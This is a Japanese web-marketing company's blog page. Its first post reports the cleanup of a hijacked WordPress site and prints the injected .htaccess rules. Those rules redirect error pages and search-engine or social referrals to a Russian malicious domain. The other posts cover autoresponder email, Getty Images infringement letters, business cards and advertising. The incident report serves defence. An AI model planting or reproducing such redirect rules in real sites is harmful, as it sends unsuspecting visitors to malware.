20
9月

ハイジャックされたワードプレスサイト

Posted by blowmarketing.com コメントは受け付けていません。


 
当事者には大変失礼ながら、非常に興味津々な状況に立ち会えたので、経緯と解決策をご報告します。
 
・状況
ワードプレスを使ってECサイトを運営している友人より相談あり、自サイトにアクセスしたら、おそロシアへ連れ去られる。
管理画面にログインは出来るが、ダッシュボード上、あらゆるリンクの遷移先が「***.ru」サイトへ向いている。
FTPもログイン出来る。
「***.ru」は検索してもノーヒット。
 
 
・確認内容と作業内容
サーバ内ファイルを日付でソートしたところ、WPディレクトリトップに置かれている「htaccess」が昨日の日付で更新されている。
ファイルを開いたところ、下段に大きく改行かつ、右に大きく改行(頭にスペース)して訳が分からぬ記述あり。
こんな感じです。

ErrorDocument 400 http://jobtectil.ru/systematic/index.php
ErrorDocument 401 http://jobtectil.ru/systematic/index.php
ErrorDocument 403 http://jobtectil.ru/systematic/index.php
ErrorDocument 404 http://jobtectil.ru/systematic/index.php
ErrorDocument 500 http://jobtectil.ru/systematic/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://jobtectil.ru/systematic/index.php [R=301,L]

これらの記述を消して「htaccess」を上書きしましたが、瞬時で書き換えられます。
(削除を選択すると権限なしと弾かれる)
怪しいファイル/フォルダはないかと探したところ、「upgrade」という妙なフォルダを発見。例によってアクセス日付が昨日でした。
中身は目視する限り空でしたが、このフォルダを削除し再度「htaccess」をアップロードしたところ、大成功。
おまじないとして、WPのパスワードとFTPのパスワードを変更。

 
・原因に関する推察
サイトのオーナーの環境は「Microsoft Security Essentials」プラス「FFFTP」を使っています。
ここから完全推察ですが、どこかの怪しいサイトを踏んで「Microsoft Security Essentials」がスルーし、「FFFTP」の脆弱性突かれてトラップ仕込まれたんじゃないでしょうか?
色々検索していたらこういう海外ブログを発見。
Htaccess Redirect to Example.ru/dir/index.php | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2010/10/14/htaccess-redirect-to-example-rudirindex-php-2/
 
状況全く一緒です。この海外ブログの方も「恐らく原因はFTP」と書かれています。
知っている人は知っている通り、GENOウィルス=Gumblarの代名詞的存在となった「FFFTP」は今年(2011年)の8月に作者さんが開発投了されていまして、いわば地雷原をスキップするような状態です。
http://www2.biglobe.ne.jp/~sota/
何を今更かもしれませんが、気になる方は「Gumblar対策」などで検索して下さい。
 
 
・最後に
今回の処理で原因の根本が除去されたのかどうか、当方では分かりません。
FFFTPを窓から投げ捨て、レジストリを掃除し(GumblarはFTPのレジストリ情報を読みに行くそうです)
窓の杜 – 【NEWS】“Gumblar”問題を受け、「FFFTP」のレジストリ設定を削除するツールが公開
http://www.forest.impress.co.jp/docs/news/20100201_346309.html
複数のウィルススキャン、それとマルウェア対策ソフトでスクリーニングする必要があるでしょう。
実行ファイルを仕込まれているのならそれを除去しない限り、同じ事の繰り返しです。

Category : ワードプレス
6
9月

ステップメールのテストラン成功

Posted by blowmarketing.com コメントは受け付けていません。

提案型営業や説明型商品、説得型商品(サービス)の強烈な営業支援ツールである「ステップメール」のセットアップ(内製化)に成功しました。
ダブルオプトイン方式・マルチシナリオ・メルマガ連動と、完ぺきな内容での仕上がり。
当社より納品した全てのお客様のホームページへ後付け組み込み可能です。

# 日本語マニュアルが流通していないため、国内でのレビューは目にしたことありません。
# 操作マニュアルらしきものは手元で完成。ネットで公開するかどうかは未定。
# 英語ではステップメールでなくautoresponderと呼ぶとは知らなんだ
# サラリーマン時代は電話営業会社をターゲットに「クレーム電話を利益に・・」とか、やったことありますよ。高レスポンスでした。

「ステップメール」そのものは多数流通していますが、自社でハンドリングしている国内の中小企業はほぼ0社と思われ(というか導入している中小企業自体が極少ですが)、自動販売機と同じで完全放置プレーで驚異的な導入効果はあるものの、業者へのASP代=ランニングコストが年間で下限6万円~平均30万円前後掛かりますので、自社運営すれば大幅な経費削減にもなりますね。

ワードプレスであれば外付け可能ですので、興味がある方はどうぞご連絡下さい。

Category : ウェブマーケティング
29
7月

ゲッティ詐欺について

Posted by blowmarketing.com コメントは受け付けていません。


 
※掲示した画像は◯ッティ・イメージズさんのトップページに似ている気がしますが、きっと気のせいです。
 
先日の中国新幹線事故報道写真でもよく目にする◯ッティイメージズさんですが、同社商品(写真)の不正使用警告連絡が何故か「ゲッティ詐欺」と呼ばれています。

先ほど知人より連絡あり、◯ッティより依頼された弁護士事務所よりファックスが届いたそうで(文面は流通しているパターンと全く一緒)、ネットで色々調べた結果、どこかのサイトに書かれていたアドバイスに従い無視することに決めたそうです・・
(警察に通報したら無視していいと言われた。その後、連絡もないよ。というサイトがあったそうで)
民事の債権債務問題に関し大胆に警察が介入したり 「その後、連絡ない」って書いているのは何月何日が最終アップデートなんですか?とか、色々突っ込みどころ満載。
 
あのね。相手からの警告手段がどうであれ、不正使用は不正使用な訳で、どちらのブログかサイトか知りませんが、無視して解決するなら裁判所はいりませぬ。
(いきなり少額訴訟が提起されたら飛行機に乗って東京の裁判所に出廷するの?)
青天井で請求されかねないこちらの落ち度100%なのに、頭隠して尻隠さずでどうするの。
(相手はこちらの連絡先知っています)
古今東西、トラブル解決は初動ですよ。敵は作戦として、ゴメンナサイすれば減額するのを折り込み済だし。
 
それと不正使用の原因は第三者にありの場合ですが(ウェブ制作会社が勝手にとかオークションで素材DVD買ったとかネットの無料素材サイトで落としたとか)、当該写真を使用している者へ愚直に請求する◯ッティ側はそんなこちらの事情など関係ない訳で、それは単なる求償権の問題ですよ。
企業間の権利侵害行為で「善意無過失」ってのは通用しません。
 
翻って、不当に安いウェブサイト制作会社ってのはそういうリーガル面など知ったことじゃないパターンが多いそうですので、安物買いの銭失いとならぬよう気を付けましょう。
 
話を戻しますが、法律素人さんが錯誤しまくりの「ロイヤリティフリー」というキャッチフレーズを全面に出し、ウォーターマークなしでサンプル画像を無制限ダウンロードさせ、頃合い見計り顧問弁護士事務所名でお手紙を送る◯ッティ・イメージズさんとか◯マナ・イメージズさんってのは、ヤクザ以上のヤクザだと思います。

Category : ウェブマーケティング | ウェブ制作
9
8月

毛筆名刺リリース開始

Posted by blowmarketing.com コメントは受け付けていません。

スポット納品させて頂いた毛筆名刺ですが、意外と好評なので書道家の先生と正式にアライアンスを組みました~ネット販売開始します。
(現在、複数のサンプル作成依頼中です、追って追記します)

名刺以外でも、毛書直筆のデジタルプリント可能です。
お気軽にお問い合わせ下さい。


毛筆名刺ページ

Category : 未分類
23
6月

事例ページ更新しました

Posted by blowmarketing.com コメントは受け付けていません。

人のサイト作るのがメインなので自社サイトが完全放置状態なのですが(笑)、お手伝いした事例を多少増やしました。
http://web.blowmarketing.com/success/
 
 
あと、ツイッタープロモートのページを作ろうかどうか画策中です。

Category : お知らせ | ウェブマーケティング
30
4月

ホームページも医薬分業が必要

Posted by blowmarketing.com コメントは受け付けていません。

最近、立て続けにホームページ関連のトラブル相談が寄せられ、原因は別にして、クライアントサイドからすると結局喧嘩別れした際にサーバーとドメインを人質に取られ、業者側からすると手を切るに切れない膠着状態となります。

どちらに非があるにせよ「ウェブ制作」と「ドメイン・レンタルサーバ」は、別々の業者手配した方がよさそうですね。
まさにウェブも医薬分業です。

Category : ウェブマーケティング | 怪しいインターネット屋
20
2月

リスティング広告が上手くいかないワケ

Posted by blowmarketing.com コメントは受け付けていません。

 なぜ上手く運用出来ないのか?

企業が安価で直接広告を掲載される時代が到来したとはいえ、成功させるには運用が非常に難しいのが現状です。

安いからといって安易に飛びつき、パソコンに詳しいからと社内の総務や営業担当者へ運営を丸投げし、グーグル・ヤフーへ毎月何万円もお金を払い続け、結局何の効果も生まないまま止めた企業を数多く知っています。
「やっぱりインターネットでビジネスは駄目だ」「インターネットは趣味の世界だ」

誰がやっても上手くいかないケースもあります。
その商品に全く市場性がないとか、低価格過ぎて費用対効果が全然合わない商品とか。
ですが、あなたの会社の商品やサービスが実社会で受け入れられているなら、インターネットの世界でも売れない筈がありません。

あと最近よく聞くのが、社内のウェブ関連を広告代理店やウェブ制作会社など外部の取引先へ丸投げしている場合、運営を受託している側がリスティング広告に対し強烈なアレルギー反応を示す例が多いみたいですね。
彼らからすると、リスティング導入すれば効果測定結果がクライアント側へ丸裸になるので受託運営のブラックボックス化に亀裂が入るのが一点、それと手間暇掛かって面倒臭い割には儲けが少なく、費用対効果がバレバレになるので「寝た子は起こさない」に限る。というのが本音みたいです。

例えば最近、当社がお手伝いした事例

運送会社事例
年に一度もネット経由で見積依頼がなかった運送会社が、今ではネット経由で月に50件のお問い合わせを受け成約率は40%に達したケースがあります。(月の広告予算は6万円)

金属加工会社事例
期待半分・不信感半分で恐る恐る3000円のネット広告を出した金属加工会社が、午前中だけで3件の問い合わせを受けたケースがあります。

女性向け美容商品通信販売会社事例
その一方、ホームページ制作に300万円以上投じ、毎月管理費を十数万円払い、過去3年間で商品が3個しか売れなかった会社のアクセス数が2日で1000件を超えました。

自社で運営するのもよし、専門会社へ依頼するのもよし
誤った使い方をすればお金をドブに捨てるに等しく、正しい使い方をすれば小額予算で破壊的な販促効果を出すのがリスティング広告です。
そして、やり方がよく分からない・社内運営するより低コストで信頼できる専門業者へ任せたい、というリクエストに応え、あなたの商品のネット広告運営代行をお手伝いするのが当社の仕事です。

Category : ウェブマーケティング | リスティング広告